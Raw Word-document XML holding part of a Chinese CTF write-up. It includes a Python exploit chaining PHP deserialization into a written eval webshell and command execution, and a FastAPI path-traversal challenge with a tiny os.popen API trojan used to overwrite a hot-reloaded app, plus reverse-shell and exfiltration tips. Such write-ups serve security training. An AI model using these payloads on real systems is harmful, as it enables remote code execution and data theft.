                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>){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 xml:space="preserve">-&gt;filename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$filename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 xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    public function __wakeup(){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>-&gt;filename = "log.txt";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public function user_register(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$username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$password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>){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 xml:space="preserve">-&gt;username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$username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 xml:space="preserve">-&gt;password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$password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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "操作时间：".date("Y-m-d H:i:s")."用户注册： 用户名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$username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 密码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$password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\n";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file_put_contents(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>-&gt;filename,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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>,FILE_APPEND);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public function user_login(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$username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$password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>){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 xml:space="preserve">-&gt;username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$username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 xml:space="preserve">-&gt;password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$password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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "操作时间：".date("Y-m-d H:i:s")."用户登陆： 用户名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$username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 密码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$password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\n";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file_put_contents(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>-&gt;filename,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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>,FILE_APPEND);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    public function user_logout(){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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "操作时间：".date("Y-m-d H:i:s")."用户退出： 用户名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$this-&gt;username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\n";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file_put_contents(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$this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>-&gt;filename,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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>,FILE_APPEND);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public function __destruct(){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    $data = "最后操作时间：".date("Y-m-d H:i:s")." 用户名 $this-&gt;username 密码 $this-&gt;password \n";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    $d = file_put_contents($this-&gt;filename,$data,FILE_APPEND);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将析构方法进行了注释删除，内容移到构造方法中，试图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">掉fast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>gc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的非预期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利用脚本如下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exp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time</w:t>
              <w:br/>
              <w:t># Author:ctfshow-h1xa</w:t>
              <w:br/>
              <w:br/>
              <w:t>url = "http://xxx/"</w:t>
              <w:br/>
              <w:br/>
              <w:t>def step1():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    data={</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "username":"userLogger",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "password":"&lt;?=eval($_POST[1]);?&gt;.php"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.post(url=url+"index.php?action=do_register",data=data)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    time.sleep(1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "script" in response.text:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("第一步执行完毕")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(response.text)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:br/>
              <w:t>def step2():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    data="token=user|O%3A11%3A%22application%22%3A6%3A%7Bs%3A6%3A%22cookie%22%3BO%3A13%3A%22cookie_helper%22%3A1%3A%7Bs%3A21%3A%22%00cookie_helper%00secret%22%3Bs%3A20%3A%22ctfshow_36d_boy_h1xa%22%3B%7Ds%3A5%3A%22mysql%22%3BO%3A12%3A%22mysql_helper%22%3A2%3A%7Bs%3A16%3A%22%00mysql_helper%00db%22%3Ba%3A7%3A%7Bs%3A3%3A%22dsn%22%3Bs%3A55%3A%22mysql%3Ahost%3D127.0.0.1%3Bdbname%3Dblog%3Bport%3D3306%3Bcharset%3Dutf8%22%3Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bs%3A4%3A%223306%22%3Bs%3A6%3A%22dbname%22%3Bs%3A4%3A%22blog%22%3Bs%3A8%3A%22username%22%3Bs%3A4%3A%22root%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22root%22%3Bs%3A7%3A%22charset%22%3Bs%3A4%3A%22utf8%22%3B%7Ds%3A6%3A%22option%22%3Ba%3A1%3A%7Bi%3A19%3Bi%3A262152%3B%7D%7Ds%3A9%3A%22dispather%22%3BN%3Bs%3A5%3A%22loger%22%3BO%3A10%3A%22userLogger%22%3A3%3A%7Bs%3A8%3A%22username%22%3BN%3Bs%3A20%3A%22%00userLogger%00password%22%3BN%3Bs%3A20%3A%22%00userLogger%00filename%22%3Bs%3A10%3A%22..%2Flog.txt%22%3B%7Ds%3A5%3A%22debug%22%3Bb%3A1%3Bs%3A10%3A%22dispatcher%22%3BO%3A10%3A%22dispatcher%22%3A0%3A%7B%7D%7D"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.get(url=url+"index.php?action=main&amp;token="+data)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    time.sleep(1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("第二步执行完毕")</w:t>
              <w:br/>
              <w:br/>
              <w:t>def step3():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    data={</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "1":"system('whoami &amp;&amp; cat /f*');",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.post(url=url+"log.txt_-%3C%3F%3Deval(%24_POST%5B1%5D)%3B%3F%3E.php",data=data)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    time.sleep(1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "www-data" in response.text:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("第三步 getshell 成功")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(response.text)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("第三步 getshell 失败")</w:t>
              <w:br/>
              <w:br/>
              <w:t>if __name__ == '__main__':</w:t>
              <w:br/>
              <w:t xml:space="preserve">    step1()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    step2()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step3()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web5 easy_api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easy_api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h1xa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400分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解析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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>openapi.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 获取路由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"openapi": "3.1.0",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "info": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "title": "FastAPI",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "version": "0.1.0"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    },</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "paths": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "/upload/": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "post": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "summary": "Upload File",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "operationId": "upload_file_upload__post",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "requestBody": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "multipart/form-data": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "schema": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "$ref": "#/components/schemas/Body_upload_file_upload__post"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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "required": true</w:t>
              <w:br/>
              <w:t xml:space="preserve">                },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "responses": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "200": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "description": "Successful Response",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "application/json": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "schema": {}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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "422": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "description": "Validation Error",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "application/json": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "schema": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                    "$ref": "#/components/schemas/HTTPValidationError"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "/uploads/{fileIndex}": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "get": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "summary": "Download File",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "operationId": "download_file_uploads__fileIndex__get",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "parameters": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "name": "fileIndex",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "in": "path",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "required": true,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "schema": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "type": "string",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "title": "Fileindex"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "responses": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "200": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "description": "Successful Response",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "application/json": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "schema": {}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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "422": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "description": "Validation Error",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "application/json": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "schema": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                    "$ref": "#/components/schemas/HTTPValidationError"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "/list": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "get": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "summary": "List File",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "operationId": "list_file_list_get",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "responses": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "200": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "description": "Successful Response",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "application/json": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "schema": {}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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "/": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "get": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "summary": "Index",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "operationId": "index__get",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "responses": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "200": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "description": "Successful Response",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "content": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "application/json": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                "schema": {}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},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "components": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        "schemas": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "Body_upload_file_upload__post": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "properties": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "file": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "type": "string",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "format": "binary",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "title": "File"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "type": "object",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "required": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "file"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "title": "Body_upload_file_upload__post"</w:t>
              <w:br/>
              <w:t xml:space="preserve">            },</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "HTTPValidationError": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "properties": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "detail": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "items": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "$ref": "#/components/schemas/ValidationError"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "type": "array",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "title": "Detail"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "type": "object",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "title": "HTTPValidationError"</w:t>
              <w:br/>
              <w:t xml:space="preserve">            },</w:t>
              <w:br/>
              <w:t xml:space="preserve">            "ValidationError": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "properties": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "loc": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "items": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            "anyOf": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                    "type": "string"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                    "type": "integer"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "type": "array",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "title": "Location"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "msg": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "type": "string",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "title": "Message"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "type": {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "type": "string",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        "title": "Error Type"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                },</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "type": "object",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "required": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "loc",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "msg",</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    "type"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">                "title": "ValidationError"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上传文件名带有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的文件发现上传失败，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有看到上传文件，怀疑使用了·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os.path.join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行了路径拼接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那只要上传文件名字换成我们需要读取的文件名字，即可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即使上传失败，通过读取路由 依然可以成功读取到敏感文件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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>fastapi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 如果使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>uvicorn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行负载，并启动了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>热部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，可以拿到路径后，直接覆盖主程序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自己写一个getshell的api即可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主要思路如下：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拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>uvicorn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>启动的目录 可以从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>环境变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>中读取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拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>uvicorn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 启动的脚本名字 cmdline中读取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cmdline 中是否有 reload参数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写一个100字符内的api木马，覆盖主程序，名字不能变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木马getshell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tips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上传文件限定长度为100字符，需要写一个微型api马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文件读取限定长度为100字符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无回显，需要反弹处理，没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ptyhon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>反弹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也可以http外带出数据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写可以path掉自己的微型马 换大马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题目的关键代码如下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@app.post("/upload/")</w:t>
              <w:br/>
              <w:t>async def upload_file(file: UploadFile,background_tasks: BackgroundTasks):</w:t>
              <w:br/>
              <w:t xml:space="preserve">  contents = await file.read()</w:t>
              <w:br/>
              <w:t xml:space="preserve">  index = str(uuid.uuid4())</w:t>
              <w:br/>
              <w:t xml:space="preserve">  name = file.filename</w:t>
              <w:br/>
              <w:t xml:space="preserve">  files.update({index:name})</w:t>
              <w:br/>
              <w:t xml:space="preserve">  uploads_dir = os.path.join(os.getcwd()+"/uploads/", files[index])</w:t>
              <w:br/>
              <w:t xml:space="preserve">  background_tasks.add_task(create_file,uploads_dir,contents[:100])</w:t>
              <w:br/>
              <w:t xml:space="preserve">  return {"fileName": index}</w:t>
              <w:br/>
              <w:t># Author:ctfshow-h1xa</w:t>
              <w:br/>
              <w:t>@app.get("/uploads/{fileIndex}")</w:t>
              <w:br/>
              <w:t>async def download_file(fileIndex: str):</w:t>
              <w:br/>
              <w:t xml:space="preserve">  dust = os.path.join(os.getcwd()+"/uploads/", files[fileIndex])</w:t>
              <w:br/>
              <w:t xml:space="preserve">  with open(dust,"r") as f:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    contents = f.read(100)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  return {"fileName": fileIndex,"fileContent":contents}</w:t>
              <w:br/>
              <w:br/>
              <w:t>@app.get("/list")</w:t>
              <w:br/>
              <w:t>async def list_file():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return {"fileName": [*files]}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微型api马可以参考，小于100字符，注意替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>${app}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为实际值，一般为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>app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uvicorn,os</w:t>
              <w:br/>
              <w:t>from fastapi import *</w:t>
              <w:br/>
              <w:t>{app} = FastAPI()</w:t>
              <w:br/>
              <w:br/>
              <w:t>@{app}.get("/s")</w:t>
              <w:br/>
              <w:t>def s(c):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os.popen(c)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exp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#-*- coding : utf-8 -*-</w:t>
              <w:br/>
              <w:t># coding: utf-8</w:t>
              <w:br/>
              <w:t>import time</w:t>
              <w:br/>
              <w:t>import requests</w:t>
              <w:br/>
              <w:t>import io,json</w:t>
              <w:br/>
              <w:br/>
              <w:t>url = "http://xxxx/"</w:t>
              <w:br/>
              <w:t>app = ''</w:t>
              <w:br/>
